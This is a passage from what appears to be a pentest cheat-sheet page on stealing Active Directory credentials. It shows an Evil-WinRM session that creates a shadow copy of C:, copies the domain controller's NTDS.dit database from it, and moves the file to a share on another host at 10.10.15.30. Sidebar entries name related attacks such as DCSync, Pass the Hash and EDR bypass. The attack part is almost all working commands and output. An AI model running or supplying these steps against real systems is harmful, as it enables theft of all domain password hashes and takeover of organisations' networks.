NTDS secrets
Shadow copy of c:\ - VSS
*Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {186d5979-2f2b-4afe-8101-9f1111e4cb1a}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2*Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
1 file(s) copied.*Evil-WinRM* PS C:\NTDS> cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\CompData
1 file(s) moved. Netexec - CME
DCSyncSecretsdump
Cracking - Hashes
HashesDomain Password Audit ToolsBackup Operators Group
Group PrivilegesServer Operators Group
Group PrivilegesPass the Hash (PtH)
Pass the Hash (PtH)Evil-WinRM
Netexec - CME
Metasploit
MetasploitBypass EDR
Mitigation
Resources
Last updated